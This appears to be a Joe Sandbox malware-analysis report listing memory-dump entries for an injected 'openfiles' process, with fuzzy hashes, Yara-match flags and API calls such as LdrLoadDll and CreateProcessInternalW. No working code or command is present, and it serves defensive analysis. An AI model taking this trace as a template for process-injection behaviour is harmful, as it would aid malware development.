                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 9a27dffd67e957edf06fff21e0cb0b8bdf7de57cca46924f47a750935881a15b
                                                                                                • Instruction ID: 7b885f49eac18f5312850112890b756ac8cc90d404e4b2353fedded8cba88220
                                                                                                • Opcode Fuzzy Hash: 9a27dffd67e957edf06fff21e0cb0b8bdf7de57cca46924f47a750935881a15b
                                                                                                • Instruction Fuzzy Hash: BD90023120140406F600759858086460005CBE1305F55D511A702D555EC765D9E56132
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: d4afe45649529311af02865679f8284d4b63c6a78a757a1f285327032fc0994d
                                                                                                • Instruction ID: 6745f7061e7c9f3ae7a8536bf1f110c943efaed96c492c42b12e3f32c562bb43
                                                                                                • Opcode Fuzzy Hash: d4afe45649529311af02865679f8284d4b63c6a78a757a1f285327032fc0994d
                                                                                                • Instruction Fuzzy Hash: 8090023120140846F60071584804B460005CBE1305F55C516A212D654D8715D9A57522
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 88f242dff307cde0c8a8da3070a3b4371203fdbea5eb6d5a8b0019f24f97c702
                                                                                                • Instruction ID: b6d9237081158ee265de334946997f62daa2e9a0d2050114e91434063ad35eac
                                                                                                • Opcode Fuzzy Hash: 88f242dff307cde0c8a8da3070a3b4371203fdbea5eb6d5a8b0019f24f97c702
                                                                                                • Instruction Fuzzy Hash: 4690023120148806F6107158880474A0005CBD1305F59C911A642D658D8795D9E57122
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: b6cf531bcd84cc3443f086f5fd4fcf37e5b762a15a025373302c1acfbee4b15a
                                                                                                • Instruction ID: e4ba3fc056450714aa2943b88664c53116c197d9acc6256d8fcffb38bdca2051
                                                                                                • Opcode Fuzzy Hash: b6cf531bcd84cc3443f086f5fd4fcf37e5b762a15a025373302c1acfbee4b15a
                                                                                                • Instruction Fuzzy Hash: D2900221242441567A45B15848045074006DBE1245795C512A341D950C8726E9AAD622
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: ba1656b8f452556bd395d993c360c1e9d4d1c782cf9a1bea3a586d4ae4d885a2
                                                                                                • Instruction ID: baa9a11ea24d9eac5f5daf023b6c2bad9cc4cd0cd12bbdfc74b51cc4e1af71e2
                                                                                                • Opcode Fuzzy Hash: ba1656b8f452556bd395d993c360c1e9d4d1c782cf9a1bea3a586d4ae4d885a2
                                                                                                • Instruction Fuzzy Hash: 0F90022921340006F6807158580860A0005CBD2206F95D915A201E558CCB15D9BD5322
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: c0b88e7d21a3d248e79c37003c0f811dd7c853c10ba9354d92ff1fe458cbe2bd
                                                                                                • Instruction ID: b7927b824a202ec9364f2d5b93c2aec476d6cb7662fddc421662b914544c5228
                                                                                                • Opcode Fuzzy Hash: c0b88e7d21a3d248e79c37003c0f811dd7c853c10ba9354d92ff1fe458cbe2bd
                                                                                                • Instruction Fuzzy Hash: AE90022130140007F640715858186064005DBE2305F55D511E241D554CDB15D9AA5223
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 56c23c7546d0172637faa0013ef8ed254b948f43b68a3ff92e5a8a74146770e7
                                                                                                • Instruction ID: 75123691a56a0d324c903868bb10a68e80289e9517c5190063558d60b348dbb3
                                                                                                • Opcode Fuzzy Hash: 56c23c7546d0172637faa0013ef8ed254b948f43b68a3ff92e5a8a74146770e7
                                                                                                • Instruction Fuzzy Hash: 3690022160140506F60171584804616000ACBD1245F95C522A302D555ECB25DAE6A132
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: b042d01c34c8bda33106f06e6bff142692a08f3c2106e6a4265e51392a6d21be
                                                                                                • Instruction ID: 0a5a7f24711023ca63e5ffe6c1a1d38a5bea961653afde91fafc50a45fde574c
                                                                                                • Opcode Fuzzy Hash: b042d01c34c8bda33106f06e6bff142692a08f3c2106e6a4265e51392a6d21be
                                                                                                • Instruction Fuzzy Hash: F390026120180407F64075584C046070005CBD1306F55C511A306D555E8B29DDA56136
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: ab0ebcf9dd96da9bd4b084e8577c18dcd31fa38e04ffa6c4fe98b39a2db63510
                                                                                                • Instruction ID: 5508e52a32d37b0602ba4e610b130dd06d9ddd8d013b3dfd45927b474ecd0b6a
                                                                                                • Opcode Fuzzy Hash: ab0ebcf9dd96da9bd4b084e8577c18dcd31fa38e04ffa6c4fe98b39a2db63510
                                                                                                • Instruction Fuzzy Hash: 7190022160140046664071688C449064005EFE2215755C621A299D550D8759D9B95666
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: b94d349fd366b01b65cd3fbec5bec63e6ffcc92c30d52e19c5a2f253ca22ff21
                                                                                                • Instruction ID: a4e2a50702a193f7e500077ef0d5531c09b6c8c1bc04bad954be111605b66742
                                                                                                • Opcode Fuzzy Hash: b94d349fd366b01b65cd3fbec5bec63e6ffcc92c30d52e19c5a2f253ca22ff21
                                                                                                • Instruction Fuzzy Hash: 9E900221211C0046F70075684C14B070005CBD1307F55C615A215D554CCB15D9B55522
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 06f6ecb65dfe4749f215b66ae735cdd9781c8898512a32379833338ad9bf3446
                                                                                                • Instruction ID: 10d15f59a9e4ef4dd27ff8d9d096845c3d60ccd2a7d8e76f7c83f39439a8fe3a
                                                                                                • Opcode Fuzzy Hash: 06f6ecb65dfe4749f215b66ae735cdd9781c8898512a32379833338ad9bf3446
                                                                                                • Instruction Fuzzy Hash: 9990026134140446F60071584814B060005CBE2305F55C515E306D554D8719DDA66127
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: a50f9c2465a6b93d50174c5d737d9b644ab149cc19ccade6ff4bd0a93eca218c
                                                                                                • Instruction ID: 4fae2e1655ccf52e24db3f728284a2185413f2ed6e6f58dcde960c9c2cabb794
                                                                                                • Opcode Fuzzy Hash: a50f9c2465a6b93d50174c5d737d9b644ab149cc19ccade6ff4bd0a93eca218c
                                                                                                • Instruction Fuzzy Hash: 8B900225211400072605B5580B045070046CBD6355355C521F301E550CD721D9B55122
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 594c79e3d8fc3e6fa9b98a6bde8ffcbcaca1c65263a7308855ccaa2fd2eb4ea4
                                                                                                • Instruction ID: 57229f1c1e2617fb5a0c4cfdbff9c03a15fa78c880137e73a560f65d303f40e8
                                                                                                • Opcode Fuzzy Hash: 594c79e3d8fc3e6fa9b98a6bde8ffcbcaca1c65263a7308855ccaa2fd2eb4ea4
                                                                                                • Instruction Fuzzy Hash: F9900225221400062645B5580A0450B0445DBD7355395C515F341F590CC721D9B95322
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 0c2e83bfe1f4a3741660f715b8483e85f658ee6637f101ef2931d67cf754cbc9
                                                                                                • Instruction ID: df6dcebf1abc95f6fa10d56f00866bb1beedc82cb1eddc6dc43a583560203256
                                                                                                • Opcode Fuzzy Hash: 0c2e83bfe1f4a3741660f715b8483e85f658ee6637f101ef2931d67cf754cbc9
                                                                                                • Instruction Fuzzy Hash: C390023160540806F650715848147460005CBD1305F55C511A202D654D8755DBA976A2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 6a5cd4d928102bec90b4decf040b349b69b2ad656b0f2455a45afae9ede03765
                                                                                                • Instruction ID: 8e727d89a11c2596069cc06f0ed04a0130b2bdb1ebd47f37e3265bd85f45e23a
                                                                                                • Opcode Fuzzy Hash: 6a5cd4d928102bec90b4decf040b349b69b2ad656b0f2455a45afae9ede03765
                                                                                                • Instruction Fuzzy Hash: B890023120544846F64071584804A460015CBD1309F55C511A206D694D9725DEA9B662
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, Offset: 04870000, based on PE: true
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004999000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.000000000499D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_4870000_openfiles.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(03F67l1929,00000111,00000000,00000000), ref: 027A05CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 03F67l1929$03F67l1929
                                                                                                • API String ID: 1836367815-2233601777
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(03F67l1929,00000111,00000000,00000000), ref: 027A05CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 03F67l1929$03F67l1929
                                                                                                • API String ID: 1836367815-2233601777
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(03F67l1929,00000111,00000000,00000000), ref: 027A05CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 03F67l1929$03F67l1929
                                                                                                • API String ID: 1836367815-2233601777
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(000007D0), ref: 027B2788
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID: net.dll$wininet.dll
                                                                                                • API String ID: 3472027048-1269752229
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 027AE747
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID: @J7<
                                                                                                • API String ID: 2538663250-2016760708
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 027AE747
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID: @J7<
                                                                                                • API String ID: 2538663250-2016760708
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 027A3FC2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Load
                                                                                                • String ID:
                                                                                                • API String ID: 2234796835-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 027A3FC2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Load
                                                                                                • String ID:
                                                                                                • API String ID: 2234796835-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,027A7843,00000010,?,?,?,00000044,?,00000010,027A7843,?,?,?), ref: 027B7FA3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_2790000_openfiles.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateInternalProcess
                                                                                                • String ID:
                                                                                                • API String ID: 2186235152-0
                                                                                                • Opcode ID: 3300340c253a61e252748895533e5e29f7e909d6d69dfbb11536b52e0ecf51ec
                                                                                                • Instruction ID: d577f57ba89a2c9c2d69092f6f3e4f2fb5f46e9cf956a3df34e0146e22046513
